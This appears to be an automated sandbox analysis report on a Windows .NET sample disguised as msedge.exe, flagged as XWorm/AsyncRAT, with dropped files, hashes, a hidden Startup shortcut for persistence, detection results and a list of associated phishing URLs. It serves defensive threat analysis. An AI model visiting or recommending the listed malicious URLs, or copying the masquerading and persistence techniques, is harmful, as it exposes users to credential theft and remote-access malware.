                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          3b5074b1b5d032e5620f69f9f700ff0eChrome Update.exeGet hashmaliciousXWormBrowse
                                          • 104.20.3.235
                                          • 149.154.167.220
                                          gdsowzgr.exeGet hashmaliciousPureLog StealerBrowse
                                          • 104.20.3.235
                                          • 149.154.167.220
                                          SecuriteInfo.com.Adware.DownwareNET.4.32136.10916.exeGet hashmaliciousUnknownBrowse
                                          • 104.20.3.235
                                          • 149.154.167.220
                                          https://ipfs.io/ipfs/QmVLJJWuJ1bT38BeLkxSKLDMhVADeV6vmCtQ5cAqW3qdoRGet hashmaliciousHTMLPhisherBrowse
                                          • 104.20.3.235
                                          • 149.154.167.220
                                          https://store.microsoft-surface.ru/noutbuki/surface-laptop-5/surface-laptop-5-15/microsoft-surface-laptop-5-15-i7-8gb-512gb-platinum-metalGet hashmaliciousUnknownBrowse
                                          • 104.20.3.235
                                          • 149.154.167.220
                                          http://pub-608d6ec484ce4b79bfcddf51573362c3.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 104.20.3.235
                                          • 149.154.167.220
                                          https://metamsk-chron-page.webflow.io/Get hashmaliciousUnknownBrowse
                                          • 104.20.3.235
                                          • 149.154.167.220
                                          https://creativeservices.netflix.com.sg-vnt-2.sosis-berurat.live/Get hashmaliciousUnknownBrowse
                                          • 104.20.3.235
                                          • 149.154.167.220
                                          http://mmetamaskl---logggin.webflow.io/Get hashmaliciousUnknownBrowse
                                          • 104.20.3.235
                                          • 149.154.167.220
                                          https://pub-9d2b09beed51451eb935ebd15cb2f914.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                          • 104.20.3.235
                                          • 149.154.167.220

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

                                          Download File
                                          Process:C:\Users\user\AppData\Local\msedge.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):654
                                          Entropy (8bit):5.380476433908377
                                          Encrypted:false
                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                          MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                          SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                          SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                          SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                          Malicious:true
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):64
                                          Entropy (8bit):0.34726597513537405
                                          Encrypted:false
                                          SSDEEP:3:Nlll:Nll
                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                          Malicious:false
                                          Preview:@...e...........................................................

                                          C:\Users\user\AppData\Local\Temp\Log.tmp

                                          Download File
                                          Process:C:\Users\user\Desktop\msedge.exe
                                          File Type:Generic INItialization configuration [WIN]
                                          Category:modified
                                          Size (bytes):58
                                          Entropy (8bit):3.598349098128234
                                          Encrypted:false
                                          SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
                                          MD5:5362ACB758D5B0134C33D457FCC002D9
                                          SHA1:BC56DFFBE17C015DB6676CF56996E29DF426AB92
                                          SHA-256:13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
                                          SHA-512:3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
                                          Malicious:false
                                          Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ahbep0r.mzd.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0b0enxrz.3gp.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0jfpc2yh.l0x.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11itbroz.xah.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14tbdkv4.jwp.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2bemkdya.scc.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehgaioq1.mfb.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewgvt2qd.neb.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hluglnke.cz4.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbf0qazw.ymh.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pu4zxtdu.edm.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qeg33l4n.wa5.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrnn0qts.ywe.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbl1qiap.hlg.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xioq0jvj.gfj.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdm1ohtm.2w2.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\msedge.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\msedge.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):170496
                                          Entropy (8bit):6.245341266540151
                                          Encrypted:false
                                          SSDEEP:3072:TvRAbFv9Y3OwrRUGKXs+S++7KFSbxeY+qDDrMm:mpv9ZGqStKEbxI
                                          MD5:AEE20D80F94AE0885BB2CABADB78EFC9
                                          SHA1:1E82EBA032FCB0B89E1FDF937A79133A5057D0A1
                                          SHA-256:498EB55B3FB4C4859EE763A721870BB60ECD57E99F66023B69D8A258EFA3AF7D
                                          SHA-512:3A05FF32B9AA79092578C09DFE67EACA23C6FE8383111DAB05117F39D91F27670029F39482827D191BD6A652483202B8FC1813F8D5A0F3F73FD35CA37A4F6D42
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\msedge.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\msedge.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\msedge.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 71%
                                          • Antivirus: Virustotal, Detection: 66%, Browse
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.f................................. ........@.. ....................................@.................................H...S.......L............................................................................ ............... ..H............text........ ...................... ..`.rsrc...L...........................@..@.reloc..............................@..B........................H.......,]...Z............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

                                          Download File
                                          Process:C:\Users\user\Desktop\msedge.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Aug 3 17:11:05 2024, mtime=Sat Aug 3 17:11:05 2024, atime=Sat Aug 3 17:11:05 2024, length=170496, window=hide
                                          Category:dropped
                                          Size (bytes):957
                                          Entropy (8bit):5.056471639892614
                                          Encrypted:false
                                          SSDEEP:24:8VXQDrlXoXmR0xSAsFGa42CL7Sr7/qygm:8VXQDrlY2R0xxsZNCLg7iyg
                                          MD5:FDECC7E05FB9D709B6DF362E8721BD5C
                                          SHA1:2A904DEB10A5B1AC9808D4A684B6FEA5EBEF3993
                                          SHA-256:CD29EF03BCA120E3D35D5B438DE82D46C520CE9F19FEB9F369335B61232B3E00
                                          SHA-512:D0A8DFCA6837E3F904350FF2B30AE95B8AE1AF21EDF8A174A8A8C927267A5CDFEF064C775F5BC8342F428C56FB593DC424FF9CFAD774DA17F686CF030241F013
                                          Malicious:false
                                          Preview:L..................F.... ...................................................n.:..DG..Yr?.D..U..k0.&...&.......$..S....!.Y....../.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.YB............................^.A.p.p.D.a.t.a...B.P.1......Y=...Local.<......EW<2.YB.....[.....................W...L.o.c.a.l.....`.2......Yc. .msedge.exe..F.......Yc..Yc...............................m.s.e.d.g.e...e.x.e.......Y...............-.......X....................C:\Users\user\AppData\Local\msedge.exe..".....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.m.s.e.d.g.e...e.x.e.............:...........|....I.J.H..K..:...`.......X.......048707...........hT..CrF.f4... ...1..Q...-...-$..hT..CrF.f4... ...1..Q...-...-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):6.245341266540151
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:msedge.exe
                                          File size:170'496 bytes
                                          MD5:aee20d80f94ae0885bb2cabadb78efc9
                                          SHA1:1e82eba032fcb0b89e1fdf937a79133a5057d0a1
                                          SHA256:498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d
                                          SHA512:3a05ff32b9aa79092578c09dfe67eaca23c6fe8383111dab05117f39d91f27670029f39482827d191bd6a652483202b8fc1813f8d5a0f3f73fd35ca37a4f6d42
                                          SSDEEP:3072:TvRAbFv9Y3OwrRUGKXs+S++7KFSbxeY+qDDrMm:mpv9ZGqStKEbxI
                                          TLSH:18F36D1D6F8AB49BD42C0EB558B7E6D1073CEF56E4E252DC24E8AE3DB792474C600B90
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&..f................................. ........@.. ....................................@................................

                                          File Icon

                                          Icon Hash:170105b232472f1f

                                          Static PE Info

                                          General

                                          Entrypoint:0x40b79e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x66ABCE26 [Thu Aug 1 18:04:22 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb7480x53.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x1fd4c.rsrc
